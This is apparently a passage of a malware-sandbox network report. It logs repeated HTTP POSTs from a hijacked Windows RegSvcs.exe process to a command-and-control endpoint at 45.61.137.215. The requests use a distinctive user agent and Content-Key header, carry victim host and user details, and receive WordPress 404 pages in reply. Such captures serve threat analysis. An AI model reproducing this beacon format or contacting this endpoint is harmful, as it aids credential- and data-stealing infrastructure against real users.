                                            May 29, 2024 15:44:41.853235960 CEST672INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                                            Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                                            May 29, 2024 15:44:41.853238106 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:44:41.853259087 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:44:41.853271008 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:44:41.853395939 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            59192.168.2.94977445.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:44:42.013115883 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:44:42.018089056 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:44:44.582916975 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:44:42 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:44:44.582964897 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                                            May 29, 2024 15:44:44.582983017 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                                            Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                                            May 29, 2024 15:44:44.582989931 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                                            Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                                            May 29, 2024 15:44:44.582997084 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                                            Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                                            May 29, 2024 15:44:44.583004951 CEST672INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                                            Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                                            May 29, 2024 15:44:44.583010912 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:44:44.583024979 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:44:44.583031893 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:44:44.583081007 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            60192.168.2.94977545.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:44:44.907871962 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:44:44.913008928 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:44:47.513607979 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:44:45 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:44:47.513663054 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:44:47.513678074 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:44:47.513700962 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:44:47.513711929 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:44:47.513735056 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:44:47.513745070 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:44:47.513746977 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:44:47.513904095 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                                            May 29, 2024 15:44:47.513931036 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                                            Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            61192.168.2.94977645.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:44:47.749478102 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:44:47.754427910 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:44:50.238756895 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:44:48 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:44:50.238770962 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                                            May 29, 2024 15:44:50.238785982 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                                            Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
